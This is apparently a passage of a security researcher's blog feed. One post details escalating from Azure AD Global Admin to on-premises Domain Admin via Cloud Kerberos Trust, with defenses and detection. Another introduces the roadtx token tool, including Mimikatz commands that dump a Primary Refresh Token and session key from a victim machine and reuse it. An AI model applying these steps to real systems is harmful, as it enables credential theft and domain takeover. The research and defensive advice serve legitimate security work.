<p><img src="/assets/img/cloudkerberos/provisioning.png" alt="Sync account update via provisioning API" class="align-center" /></p>

<p>This is WCF binary XML, a standard used in .NET to transfer XML data in binary format. Lucky for me, there is an open source Python parser that was released by <a href="https://github.com/ernw/python-wcfbin">ERNW</a> many years ago. There are even some recent patches that <a href="https://github.com/ernw/python-wcfbin/issues/15">fix</a> compatibility issues with the synchronization API, contributed by <a href="https://github.com/AndreasLrx">@AndreasLrx</a> and <a href="https://github.com/sfonteneau">@sfonteneau</a>. Using this library to decode the WCF binary data, we get a much more readable XML document:</p>

<p><img src="/assets/img/cloudkerberos/provisioning_xml.png" alt="Provisioning data in XML format" class="align-center" /></p>

<p>We can use this API call to modify the SAM name and SID of any hybrid user, and then if we authenticate, we get a partial TGT containing the modified SID.</p>

<p><img src="/assets/img/cloudkerberos/newpac.png" alt="Partial TGT containing the modified SID" class="align-center" /></p>

<p>Note that we can do the same with AADInternals, which also supports the binary XML format and can update synced users over this protocol via the <a href="https://aadinternals.com/aadinternals/#set-aadintazureadobject-a">Set-AADIntAzureADObject</a> cmdlet.</p>

<h2 id="attack-prerequisites">Attack prerequisites</h2>
<p>For the attack to succeed and give us Domain Admin privileges, we have a few requirements:</p>

<ul>
  <li>Privileges to modify accounts via the synchronization API. As mentioned, the Global Admin role or the AD Connect sync account would work in this case. The Hybrid Identity Administrator role would also provide the necessary permissions, since it can manage AD Connect and create new sync accounts.</li>
  <li>At least one hybrid account which we can modify and also authenticate as. This could be the same account as in the previous point, but since best practices indicate that hybrid accounts should not hold highly privileged roles, it is unlikely that the admin account is synced from on-premises.</li>
  <li>A victim account to target in Active Directory. While we could use this attack on any already synced account without modifying its attributes, we cannot have duplicate on-premises security identifiers in an Azure AD tenant, so to modify an account and obtain a ticket for the victim, the victim account must not be synced.</li>
</ul>

<p>There are several methods to obtain access to a hybrid account. They vary slightly in how much noise they generate and in whether the real user we are targeting can keep working or will have their authentication broken.</p>

<ul>
  <li>Obtain the password for any synced account (for example using spraying, on-premises lateral movement, etc).</li>
  <li>Reset the password for a hybrid account via an admin portal; this would also reset it in Active Directory if password writeback is enabled.</li>
  <li>Change the password for a synchronized Azure AD account using the Synchronization API. This leaves the original password in Active Directory in place, but will cause a disconnect between the password in Azure AD and AD. We could obtain the NT hash for this account via the TGT upgrade request, and if we can recover the original password from the NT hash we could set the password back later.</li>
  <li>Assign passwordless credentials to the account. It used to be possible to provision Windows Hello for Business keys directly on an account, as I talked about <a href="https://dirkjanm.io/assets/raw/Windows%20Hello%20from%20the%20other%20side_x33fcon.pdf">at various conferences this year</a>, but this has been fixed. An alternative workaround is to assign a Temporary Access Pass (TAP) to an account, set up the passwordless methods that way, and then obtain a PRT with them.</li>
  <li>Create a new user account with a known password via the synchronization API and set the target SID directly.</li>
</ul>

<p>Lastly, we will need an account to target in the on-premises Active Directory that has Domain Admin or equivalent privileges, but is not denied in the replication configuration of the RODC. In any large domain, there are probably several accounts that have equivalent privileges without being explicit members of the Domain Admins group. For this scenario, however, we will focus on an account that should be present in any domain that is set up as hybrid. The ideal victim for this attack is in fact the Active Directory account used by the AD Connect sync service. This account is not synced to Azure AD, so its SID is available to target, and it has Domain Admin equivalent privileges because of its ability to synchronize password hashes (assuming Password Hash Sync is in use). If AD Connect was set up using the express installation, its name will start with <strong>MSOL_</strong>. If it has a different name, you should be able to find it by listing all the accounts that have directory replication privileges on the domain object.</p>

<p><img src="/assets/img/cloudkerberos/replprivs.png" alt="Replication privileges on domain object for MSOL account" class="align-center" /></p>

<h2 id="the-full-attack">The full attack</h2>
<p>Now that we know the requirements, let’s go through the full attack. We have a Global Admin account <code class="language-plaintext highlighter-rouge">dirkjan@iminyour.cloud</code> to perform the attack with, and a hybrid account <code class="language-plaintext highlighter-rouge">hybrid@hybrid.iminyour.cloud</code> that we can modify. In this case we know the password for the hybrid account, which is all we need to get a PRT for it. We also queried the sync account, which is called <code class="language-plaintext highlighter-rouge">MSOL_9c3bf742d8e9</code> in my tenant and has security identifier <code class="language-plaintext highlighter-rouge">S-1-5-21-1414223725-1888795230-1473887622-1104</code>.</p>

<p>The first step is obtaining an access token for the Global Admin. The synchronization service uses the same resource ID as the Azure AD Graph API, so we can use roadtx to get a token for our admin account. We can do this using the <code class="language-plaintext highlighter-rouge">gettokens</code> command if we don’t need MFA, or use the <code class="language-plaintext highlighter-rouge">interactiveauth</code> command to get an interactive window that supports MFA as well. In this example my credentials are stored in a KeePass database, so I use the <code class="language-plaintext highlighter-rouge">keepassauth</code> command:</p>

<p><img src="/assets/img/cloudkerberos/roadtx_auth.png" alt="Obtaining an access token for the sync api" class="align-center" /></p>

<p>Next, we can modify the <code class="language-plaintext highlighter-rouge">hybrid@hybrid.iminyour.cloud</code> identity with the <code class="language-plaintext highlighter-rouge">modifyuser.py</code> script from <code class="language-plaintext highlighter-rouge">roadtools_hybrid</code>. An important parameter here is the <code class="language-plaintext highlighter-rouge">SourceAnchor</code>, since this is used to match the user with the Azure AD account. In the portal, this is called the “On-premises immutable ID” and in ROADrecon you can find this as the <code class="language-plaintext highlighter-rouge">immutableId</code> attribute on the user object. We can also use a non-existing <code class="language-plaintext highlighter-rouge">SourceAnchor</code> to create a new user, this just introduces an extra step to add a password to the account. We also supply the target SAM name and desired SID to the tool, which will change these on the <code class="language-plaintext highlighter-rouge">hybrid@hybrid.iminyour.cloud</code> user object:</p>
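<p>As a side note on the <code class="language-plaintext highlighter-rouge">SourceAnchor</code>: in default AD Connect configurations this anchor is derived from the on-premises objectGUID, and the immutable ID you see in the portal is simply the base64 encoding of the GUID bytes in their little-endian binary layout. A quick stdlib sketch of the conversion (assuming the default GUID-based source anchor, not a custom one):</p>

```python
import base64
import uuid

def guid_to_immutable_id(guid_str):
    """objectGUID string -> immutableId/SourceAnchor (base64 of the GUID bytes)."""
    return base64.b64encode(uuid.UUID(guid_str).bytes_le).decode()

def immutable_id_to_guid(immutable_id):
    """immutableId/SourceAnchor -> objectGUID string."""
    return str(uuid.UUID(bytes_le=base64.b64decode(immutable_id)))

# Example GUID (the device ID from earlier in this post, reused for illustration)
guid = "5f138d8b-6416-448d-89ef-9b279c419943"
anchor = guid_to_immutable_id(guid)
print(anchor)
assert immutable_id_to_guid(anchor) == guid  # round-trips cleanly
```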

<p><img src="/assets/img/cloudkerberos/modifycmd.png" alt="Modifying the user SID and SAM" class="align-center" /></p>

<p>We can confirm in the Azure Portal that the user’s properties have been changed:</p>

<p><img src="/assets/img/cloudkerberos/syncchange.png" alt="New properties in the Azure Portal" class="align-center" /></p>

<p>Now that the account is modified, we can request a PRT for this user, including the partial TGT. It is best to wait a minute to make sure our change has synchronized properly, but usually this is quite fast:</p>

<p><img src="/assets/img/cloudkerberos/newprtrequest.png" alt="Requesting a new PRT" class="align-center" /></p>

<p>With the partial TGT, we can request the full TGT and recover the NT hash, this time for the MSOL account:</p>

<p><img src="/assets/img/cloudkerberos/msolntrecovery.png" alt="Recovering the NT hash of the MSOL account" class="align-center" /></p>

<p>With the full TGT (or the NT hash) we can talk to the Domain Controller and perform a DCSync attack, synchronizing all the password hashes, including the hash of the KRBTGT account, which allows us to forge our own TGTs, essentially elevating our access to full Domain Admin.</p>

<p><img src="/assets/img/cloudkerberos/dcsync.png" alt="Performing DCSync with the MSOL account" class="align-center" /></p>

<p>As a last step, it is advisable to change the account back to its original SAM name and SID using <code class="language-plaintext highlighter-rouge">modifyuser.py</code>, or to delete the account if we created a new one. This step is optional, since from what I have seen, Azure AD Connect will pick up the modification and revert it automatically.</p>

<h1 id="defenses-and-detection">Defenses and detection</h1>
<p>The Cloud Kerberos Trust introduces a trust from Active Directory to Azure AD. If the Azure AD tenant is fully compromised, this allows attackers to move laterally between synchronized identities via one of the methods from the previous section. This is not something that can be fully prevented, so one of the best defenses here is to use the tools available in Azure AD to protect your highly privileged identities. In addition, highly privileged users should exist only in the environment they manage. That means no synced accounts in Azure AD administrator roles, and no AD admin accounts synced to Azure AD.</p>

<p>The RODC object that Azure AD creates also offers some possibilities for defense. Like with a normal RODC, you could add additional accounts and groups to the “Denied password replication” list. If you have highly privileged groups, it would make sense to exclude those from Cloud Kerberos Trust, though this does mean they can no longer use passwordless methods to authenticate to on-premises resources, since this blocks both Kerberos authentication and NT hash recovery. In any case, adding accounts that do not need to authenticate with passwordless methods (such as the MSOL sync account) would be a good starting point:</p>

<p><img src="/assets/img/cloudkerberos/aadkerberos_denymsol.png" alt="Preventing abuse of the MSOL account" class="align-center" /></p>

<p>Impersonating an account that is denied will cause the attack to fail with a <code class="language-plaintext highlighter-rouge">KDC_ERR_TGT_REVOKED</code> error.</p>

<p>On the detection side, there is some good news and some bad news. The bad news is that Azure AD does not log changes to the SAM name and SID properties, so you have no way of creating targeted detections for this specific attack. The good news is that there are still ways to identify parts of it. The change to the hybrid object is logged and shows the actor (our Global Admin) as well as the modified “LastDirSyncTime” property. The “LastDirSyncTime” property only gets updated when the synchronization API is used, not during regular user modifications.</p>

<p><img src="/assets/img/cloudkerberos/syncaudit.png" alt="Audit log showing only the modified timestamp" class="align-center" /></p>

<p>Since in normal operations Global Admin accounts should not be using the synchronization API, this is a clear sign of something irregular going on. The other actions, such as resetting passwords or setting passwordless authentication methods on accounts, are part of an admin’s normal work, so creating detections for those may be noisier.</p>

<h1 id="tooling-and-credits">Tooling and credits</h1>
<p>The tools are available on the <a href="https://github.com/dirkjanm/ROADtools">ROADtools</a> and <a href="https://github.com/dirkjanm/ROADtools_hybrid">ROADtools hybrid</a> GitHub pages. Thanks to the following people for their prior work:</p>

<ul>
  <li><a href="https://github.com/ernw/python-wcfbin">Timo Schmid</a>, <a href="https://github.com/AndreasLrx">@AndreasLrx</a> and <a href="https://github.com/sfonteneau">@sfonteneau</a> for the python-wcfbin library.</li>
  <li><a href="https://twitter.com/DrAzureAD">DrAzureAD</a> for some helpful details on how the AD Sync protocol works and his implementation in AADInternals.</li>
  <li><a href="https://twitter.com/0xdeaddood">Leandro Cuozzo</a> for his blog on <a href="https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/">Cloud Kerberos Trust and the Key List attack</a>.</li>
</ul>

<p>Lastly, while finalizing this blog I also noticed that <a href="https://twitter.com/hotnops">Daniel Heinsen</a> and <a href="https://twitter.com/elad_shamir">Elad Shamir</a> gave <a href="https://pretalx.com/fwd-cloudsec-2023/talk/8MRJT3/">a talk</a> on a similar topic yesterday. While I have not yet seen the talk, I wanted to give a shout-out to them for their work as well and I’m looking forward to reading their approach on this topic.</p>]]></content><author><name>Dirk-jan Mollema</name></author><summary type="html"><![CDATA[Many modern enterprises operate in a hybrid environment, where Active Directory is used together with Azure Active Directory. In most cases, identities will be synchronized from the on-premises Active Directory to Azure AD, and the on-premises AD remains authoritative. Because of this integration, it is often possible to move laterally towards Azure AD when the on-premises AD is compromised. Moving laterally from Azure AD to the on-prem AD is less common, as most of the information usually flows from on-premises to the cloud. The Cloud Kerberos Trust model is an exception here, since it creates a trust from the on-premises Active Directory towards Azure AD, and thus it trusts information from Azure AD to perform authentication. In this blog we will look at how this trust can be abused by an attacker that obtains Global Admin in Azure AD, to elevate their privileges to Domain Admin in environments that have the Cloud Kerberos Trust set up. 
Since this technique is a consequence of the design of this trust type, the blog will also highlight detection and prevention measures admins can implement.]]></summary></entry><entry><title type="html">Introducing ROADtools Token eXchange (roadtx) - Automating Azure AD authentication, Primary Refresh Token (ab)use and device registration</title><link href="https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/" rel="alternate" type="text/html" title="Introducing ROADtools Token eXchange (roadtx) - Automating Azure AD authentication, Primary Refresh Token (ab)use and device registration" /><published>2022-11-09T11:08:57+00:00</published><updated>2022-11-09T11:08:57+00:00</updated><id>https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx</id><content type="html" xml:base="https://dirkjanm.io/introducing-roadtools-token-exchange-roadtx/"><![CDATA[<p>Ever since the initial release of <a href="https://dirkjanm.io/introducing-roadtools-and-roadrecon-azure-ad-exploration-framework/">ROADrecon</a> and the ROADtools framework I have been adding new features to it, especially on the authentication side. As a result, it supports many forms of authentication, such as using <a href="https://dirkjanm.io/digging-further-into-the-primary-refresh-token/">Primary Refresh Tokens</a> (PRTs), PRT cookies, and regular access/refresh tokens. The authentication modules are all part of the shared library roadlib, and can be used in other tools by importing the library. Even though you can request tokens for any Azure AD connected resource and with many client IDs, the only tool exposing this authentication part was ROADrecon. It always felt unnatural and illogical to tell people that you can use a recon tool to request tokens for many other purposes. So I decided to start writing a new tool, which revolves around requesting and using Azure AD tokens. 
As I was working on this, I started adding proofs of concept I wrote during my Azure AD devices research to the tool, adding support for registering devices and requesting Primary Refresh Tokens using device credentials. I also added various modules for injecting PRTs into browser sessions with Selenium, and for automating authentication with MFA. The result is a comprehensive tool called ROADtools Token eXchange, or simply roadtx. Currently it has the following capabilities:</p>

<ul>
  <li>Register and join devices to Azure AD.</li>
  <li>Request Primary Refresh Tokens from user credentials or other valid tokens.</li>
  <li>Use Primary Refresh Tokens in a similar way as the Web Account Manager (WAM) in Windows does.</li>
  <li>Perform several different OAuth2 token redemption flows.</li>
  <li>Perform interactive logins based on Browser SSO by injecting the Primary Refresh Token into the authentication flow.</li>
  <li>Add SSO capabilities to Chrome via the Windows 10 accounts plugin and a custom browsercore implementation.</li>
  <li>Automate sign-ins, MFA and token requesting to various resources in Azure AD by using Selenium.</li>
  <li>Possibility to load credentials and MFA TOTP seeds from a KeePass database to use in (semi-)automated flows.</li>
</ul>

<p>In this blog I will describe the tool’s features and show some demonstrations of the cool stuff you can do with it. You can also skip directly to <a href="https://github.com/dirkjanm/ROADtools">GitHub</a> or read the <a href="https://github.com/dirkjanm/ROADtools/wiki/ROADtools-Token-eXchange-(roadtx)">Wiki</a> for details on each command.</p>

<h1 id="roadtx-structure">roadtx structure</h1>
<p>roadtx is structured as a wrapper tool around features implemented in roadlib. With the release of roadtx, a new class has been added to roadlib with all device authentication logic, containing functions that register/join devices and can request or use Primary Refresh Tokens in the same way that Windows uses them. In roadtx itself, there is a class with helper functions for <a href="https://www.selenium.dev/">Selenium</a>-based authentication and support for intercepting browser requests to add SSO features to the browser window.</p>

<p>The main function of roadtx itself is about 400 lines of code that construct an (I hope) straightforward collection of commands with their parameters, plus about 300 lines of code that handle those commands and call the library functions with the data they need. Because the actual device logic lives in roadlib, it is possible to re-use it in other tools or to build lightweight standalone tools without needing all the roadtx-specific dependencies.</p>

<p>I’ve also tried to make roadtx intuitive and straightforward to use, reducing the command line arguments needed to perform specific actions. For example, <code class="language-plaintext highlighter-rouge">roadtx device</code> will register a device with randomized defaults, and functions dealing with Primary Refresh Tokens will by default load the PRT from a <code class="language-plaintext highlighter-rouge">roadtx.prt</code> file, so you don’t have to specify it every time you use a function.</p>

<h1 id="using-roadtx">Using roadtx</h1>
<h2 id="devices-and-primary-refresh-tokens">Devices and Primary Refresh Tokens</h2>
<p>Most of the modules of roadtx are designed around Primary Refresh Tokens and device identities. To obtain a PRT, we must first register a device in Azure AD. Registering a device requires an access token for the device registration service resource. This access token must not contain a device claim, so you cannot use single sign-on or an existing PRT to request one. There are a few ways to obtain such a token with roadtx, some of which support MFA and some of which do not. MFA may be required to register a device, depending on tenant settings. If it is not, you can request a token for the device registration service (specified here through the <em>devicereg</em> alias) with only a username and password:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx gettokens -u myuser@mytenant.com -p password -r devicereg
</code></pre></div></div>

<p>If MFA is required, you can use the device authentication flow to request the tokens from a browser window somewhere:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx gettokens --device-auth -r devicereg
</code></pre></div></div>

<p>Alternatively, we can skip ahead a bit to the functionality shown later in this blog, and use a Selenium-based window for MFA while autofilling the username and password:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx interactiveauth -u myuser@mytenant.com -p password -r devicereg
</code></pre></div></div>

<p>Any of the commands above will save an access token to the <code class="language-plaintext highlighter-rouge">.roadtools_auth</code> file, and the device registration command will automatically load it from this file. You can customize the device properties with various command line parameters to the <code class="language-plaintext highlighter-rouge">roadtx device</code> module:</p>

<p><img src="/assets/img/roadtx/roadtx_device.png" alt="device command" /></p>

<p>We register an Azure AD joined device with the name “blogdevice”:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx device -n blogdevice
Saving private key to blogdevice.key
Registering device
Device ID: 5f138d8b-6416-448d-89ef-9b279c419943
Saved device certificate to blogdevice.pem
</code></pre></div></div>

<p>We get two pieces of data that identify our device. The first is the device certificate saved in <code class="language-plaintext highlighter-rouge">blogdevice.pem</code>, which is issued by Azure AD and identifies our device. The second is the <code class="language-plaintext highlighter-rouge">blogdevice.key</code> file, which contains the private key of the certificate and is also used as the transport key. Now that we have the device certificate, we can perform operations that require a device identity. The most useful one is requesting a Primary Refresh Token, since that will enable us to add Single Sign On capabilities to our (interactive or automated) token requests.</p>

<h3 id="requesting-a-primary-refresh-token">Requesting a Primary Refresh Token</h3>
<p>A Primary Refresh Token is most often requested with a username and password. When you log in to an Azure AD joined or hybrid joined workstation with your username and password, Windows immediately requests a PRT from Azure AD. I’ve talked about the technicalities behind this flow at my Troopers and Romhack <a href="/talks/">talks</a> in the past, so if you’re interested in the details, have a read through those slides. To request a PRT with roadtx, run the <code class="language-plaintext highlighter-rouge">roadtx prt</code> command and specify the device cert/key and the username + password to use, and you get a PRT:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prt -u myuser@mytenant.com -p password --key-pem blogdevice.key --cert-pem blogdevice.pem
</code></pre></div></div>

<p>The command will give us a PRT (in the form of an encrypted token), and a session key that we need to use the PRT. The PRT is by default saved to <code class="language-plaintext highlighter-rouge">roadtx.prt</code>, where it can be picked up by other roadtx modules.</p>

<p>A PRT is by default valid for 90 days, but we can renew it at any time to extend the validity for another 90 days with the <code class="language-plaintext highlighter-rouge">renew</code> action:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prt -a renew
Renewing PRT
Saved PRT to roadtx.prt
</code></pre></div></div>

<p>Note that the PRT we requested here is only based on a password, so any authentication that requires MFA will fail even if we use the PRT. We can also upgrade or “enrich” the PRT with an MFA claim; this is shown in the next section on Selenium-based authentication.</p>

<h3 id="using-primary-refresh-tokens-on-the-command-line">Using Primary Refresh Tokens on the command line</h3>
<p>Once we have a PRT, we can use it to sign in to resources that accept Azure AD authentication. You can do this either with the <code class="language-plaintext highlighter-rouge">roadtx gettokens</code> command, specifying the PRT and session key on the command line, or with the <code class="language-plaintext highlighter-rouge">roadtx prtauth</code> command. The difference between the two is that the <code class="language-plaintext highlighter-rouge">gettokens</code> command implements authentication based on how Chrome does Single Sign On in the browser. This method is slightly hacky and won’t give you any feedback if it fails.</p>

<p>The <code class="language-plaintext highlighter-rouge">prtauth</code> module instead emulates the Web Account Manager (WAM) that Windows uses when you request access tokens from an app or native process. The WAM acts as a token broker and requests tokens on behalf of other clients. It uses a combination of signed requests and encrypted responses to prevent exposing the tokens in transit, all done using the PRT session key. roadtx implements these flows and is able to perform the same authentication. In practice, you can use this module with any client that is either marked as public or has a redirect URL for a native app. By default, the <code class="language-plaintext highlighter-rouge">roadtx prtauth</code> module will use the Azure AD PowerShell module client ID and the Azure AD Graph as resource, but you can specify any other client ID or resource URL, either by its full identifier or as an alias (listable with <code class="language-plaintext highlighter-rouge">roadtx listaliases</code>):</p>
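<p>For those curious about the cryptography behind these signed requests: the JWTs are not signed with the session key itself, but with a key derived from it using the NIST SP 800-108 counter-mode KDF (HMAC-SHA256) with the label <code class="language-plaintext highlighter-rouge">AzureAD-SecureConversation</code> and a random context that is sent along in the JWT header. The sketch below follows that construction as I described it in my earlier PRT research; treat the exact parameters as an assumption to verify against a live capture:</p>

```python
import hashlib
import hmac
import os
import struct

def derive_signing_key(session_key: bytes, ctx: bytes) -> bytes:
    """SP 800-108 counter-mode KDF (HMAC-SHA256), single block for a 256-bit key."""
    label = b"AzureAD-SecureConversation"
    # [counter (BE)] || label || 0x00 || context || [output length in bits (BE)]
    data = struct.pack(">I", 1) + label + b"\x00" + ctx + struct.pack(">I", 256)
    return hmac.new(session_key, data, hashlib.sha256).digest()

session_key = os.urandom(32)   # in reality: the decrypted PRT session key
ctx = os.urandom(24)           # random per-request context, sent in the JWT header
signing_key = derive_signing_key(session_key, ctx)
assert len(signing_key) == 32
```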

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prtauth
Tokens were written to .roadtools_auth
</code></pre></div></div>

<p>Example using the Azure CLI as client ID and requesting tokens for the Azure Resource Manager:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prtauth -c azcli -r azrm     
Tokens were written to .roadtools_auth
</code></pre></div></div>

<p>There are also other options you can use to specify other resources or the correct redirect URL for the app you are using:</p>

<p><img src="/assets/img/roadtx/roadtx_device.png" alt="prtauth command" /></p>

<h1 id="selenium-based-azure-ad-authentication">Selenium based Azure AD authentication</h1>
<p>Command line based token requests and usage are nice, but often you will encounter some flow that either requires a browser window to do Multi-Factor Authentication, or you simply want to use your PRT interactively to browse things like the Azure Portal or read your mail using a stolen PRT. roadtx supports this in various ways, via methods based on <a href="https://selenium.dev">Selenium</a>. For these methods to work, you first need to download the <a href="https://github.com/mozilla/geckodriver/releases">gecko driver</a>, which roadtx uses together with Selenium to control the browser window (based on Firefox). You should put the geckodriver in your PATH or in the directory you run the roadtx commands from, or in any other location if you want to specify the path manually each time.</p>

<p>The principle of Selenium based operations in roadtx is simple: it launches a browser window, tries to autofill any credentials that you supplied to the command, and lets you fill in the rest by hand. If you have your accounts set up correctly, it will do the authentication fully automatically. I use this frequently for research purposes where I am dealing with multiple identities, need to get tokens for different resources, and/or am testing with MFA enabled. It can also be used to automatically inject PRTs into the authentication flow and to use them to browse sites with automatic authentication.</p>

<h2 id="interactive-authentication">Interactive authentication</h2>
<p>In the simplest form, roadtx will launch a browser for you, request a token for the indicated service, fill in any credentials you specified, and obtain tokens. Example:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx interactiveauth -u myuser@mytenant.com -p password
</code></pre></div></div>

<p>If MFA is required, you can enter that and obtain a token with MFA claim. If not, it will capture the output and save the requested tokens. You can specify the client ID you want to use with <code class="language-plaintext highlighter-rouge">-c</code> and the resource to authenticate to with <code class="language-plaintext highlighter-rouge">-r</code>. Here’s a short demo:</p>

<video width="100%" controls="">
  <source src="/assets/video/selenium_autofill.mp4" type="video/mp4" />
  <source src="/assets/video/selenium_autofill.webm" type="video/webm" />
</video>

<h2 id="keepass-credentials-based-authentication">KeePass credentials based authentication</h2>
<p>If you’re dealing with many different accounts during research, copy/pasting credentials and entering MFA information becomes quite tedious. roadtx supports sourcing credentials and TOTP based MFA information from a kdbx file (KeePass file) or KeePass XML export. To use this, use the <code class="language-plaintext highlighter-rouge">roadtx keepassauth</code> command. It accepts a KeePass file with the <code class="language-plaintext highlighter-rouge">-kp</code> parameter, or if you leave this parameter out, it tries to load <code class="language-plaintext highlighter-rouge">roadtx.kdbx</code> from the current directory. The password of the KeePass file can be specified with <code class="language-plaintext highlighter-rouge">-kpp</code> or via the <code class="language-plaintext highlighter-rouge">KPPASS</code> environment variable. The only required parameter is the username, which it will look up in the KeePass file. It will autofill the password and also the OTP code if “Mobile app OTP” is enabled as an MFA method on the account. This requires the TOTP seed to be stored in the <code class="language-plaintext highlighter-rouge">otp</code> additional parameter of the identity in the KeePass file. For instructions on how to set this up and some caveats of using KeePass files, see the <a href="https://github.com/dirkjanm/ROADtools/wiki/ROADtools-Token-eXchange-(roadtx)">roadtx wiki</a>.</p>
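<p>The OTP codes generated from such a seed follow the standard TOTP algorithm (RFC 6238, HMAC-SHA1). As a rough sketch of what that computation looks like, using only the Python standard library (this is illustrative, not roadtx's actual implementation):</p>

```python
import base64
import hmac
import struct
import time

def totp(seed_b32, timestep=30, digits=6, when=None):
    """Compute an RFC 6238 TOTP code (HMAC-SHA1) from a base32 seed."""
    key = base64.b32decode(seed_b32.upper().replace(" ", ""))
    counter = int((time.time() if when is None else when) // timestep)
    digest = hmac.new(key, struct.pack(">Q", counter), "sha1").digest()
    offset = digest[-1] & 0x0F  # dynamic truncation per RFC 4226
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC 6238 test vector: ASCII key "12345678901234567890" at T=59
print(totp("GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ", digits=8, when=59))  # → 94287082
```

This is also what <code class="language-plaintext highlighter-rouge">roadtx getotp</code> does for you when you need a code by hand.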

<p>Here is another demo of authentication to the Microsoft Graph using an account that requires MFA, the credentials and OTP are automatically loaded from the KeePass file:</p>

<video width="100%" controls="">
  <source src="/assets/video/selenium_kpautofill.mp4" type="video/mp4" />
  <source src="/assets/video/selenium_kpautofill.webm" type="video/webm" />
</video>

<p>Aside from requesting tokens directly, you can also use this as an interactive browser window with auto authentication. To do this, specify a URL manually that will redirect you to the Microsoft sign-in page. For example, using <code class="language-plaintext highlighter-rouge">-url https://myaccount.microsoft.com</code> will open a browser, authenticate you, and go to the “My account” page. You can use <code class="language-plaintext highlighter-rouge">--keep-open</code> to keep the browser window open after authentication, which makes it possible to browse to other pages from an authenticated perspective. Example:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx keepassauth -url https://myaccount.microsoft.com --keep-open -u myuser@mytenant.com -kp accounts.kdbx -kpp keepassfilepassword
</code></pre></div></div>

<h2 id="primary-refresh-token-authentication-in-browser">Primary Refresh Token authentication in browser</h2>
<p>A more interesting scenario is using a Primary Refresh Token that you either registered yourself or that you <a href="https://dirkjanm.io/digging-further-into-the-primary-refresh-token/">stole from a legitimate endpoint</a> during a red team to create an interactive browser experience. Let’s assume that we dumped a PRT and session key using Mimikatz from an endpoint (this is only possible if it doesn’t use a Trusted Platform Module). We can use this PRT on the command line, or we can automatically inject it into our Selenium browser session. roadtx does this by proxying the browser traffic through itself and injecting a PRT cookie at various points during authentication. On the victim endpoint, we can use Mimikatz to dump the PRT and session key with the following commands:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>privilege::debug
sekurlsa::cloudap
</code></pre></div></div>

<p>Mimikatz gives us the PRT and encrypted session key (the <em>KeyValue</em> of the <em>ProofOfPossesionKey</em> field), which we can decrypt from a <code class="language-plaintext highlighter-rouge">SYSTEM</code> context.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>token::elevate
dpapi::cloudapkd /keyvalue:cryptedkey /unprotect
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">cloudapkd</code> function will give us the clear session key (if not stored in TPM), and a derived key. We will need the clear key for roadtx:</p>

<p><img src="/assets/img/roadtx/mimikatz_dump.png" alt="dumping PRT with mimikatz" /></p>

<p>To make our life easier, we renew the PRT first, which will save it in <code class="language-plaintext highlighter-rouge">roadtx.prt</code>:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx prt -a renew --prt &lt;PRT From mimikatz&gt; --prt-sessionkey &lt;clear key from mimikatz&gt;
</code></pre></div></div>

<p>Now we can request tokens using the interactive browser with <code class="language-plaintext highlighter-rouge">roadtx browserprtauth</code>. If we use the <code class="language-plaintext highlighter-rouge">roadtx describe</code> command, we see the access token includes an MFA claim because the PRT I used in this case also had an MFA claim.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>roadtx browserprtauth
roadtx describe &lt; .roadtools_auth
</code></pre></div></div>

<p><img src="/assets/img/roadtx/roadtx_describe.png" alt="MFA claim from the PRT" /></p>
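<p>If you want to check for the MFA claim programmatically rather than with <code class="language-plaintext highlighter-rouge">roadtx describe</code>, the payload of the access token is just base64url-encoded JSON. A minimal sketch (not part of roadtx; note that it decodes the claims without any signature validation):</p>

```python
import base64
import json

def jwt_claims(token):
    """Return the (unverified) claims from a JWT's payload section."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload))

def has_mfa_claim(token):
    # Entra ID lists the authentication methods in the 'amr' claim;
    # 'mfa' means multi-factor authentication was performed.
    return "mfa" in jwt_claims(token).get("amr", [])
```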

<p>Similar to the previous command, we can also use this for interactive browsing in the Selenium window:</p>

<video width="100%" controls="">
  <source src="/assets/video/selenium_prtauth.mp4" type="video/mp4" />
  <source src="/assets/video/selenium_prtauth.webm" type="video/webm" />
</video>

<h2 id="primary-refresh-token-usage-with-other-accounts">Primary Refresh Token usage with other accounts</h2>
<p>An interesting use case for stolen Primary Refresh Tokens is that you can also use them for other accounts to add device claims to the authentication. For example, if there is a conditional access policy that requires a compliant or hybrid joined corporate device to access specific resources, the device claim originates from the primary refresh token used during authentication. This claim can also be used for other users. So if I have a stolen PRT from a compliant device for user <code class="language-plaintext highlighter-rouge">tpmtest@iminyour.cloud</code>, I can use this PRT with the credentials of <code class="language-plaintext highlighter-rouge">newlowpriv@iminyour.cloud</code> to sign in and pass the compliance check.</p>

<p>In this example we still have the stolen PRT from <code class="language-plaintext highlighter-rouge">tpmtest@iminyour.cloud</code> used in the example above saved as <code class="language-plaintext highlighter-rouge">roadtx.prt</code>. I can use this PRT together with the credentials of <code class="language-plaintext highlighter-rouge">newlowpriv</code> that are stored in my KeePass file to sign in to Microsoft Teams and access data there with the <code class="language-plaintext highlighter-rouge">roadtx browserprtinject</code> command.</p>

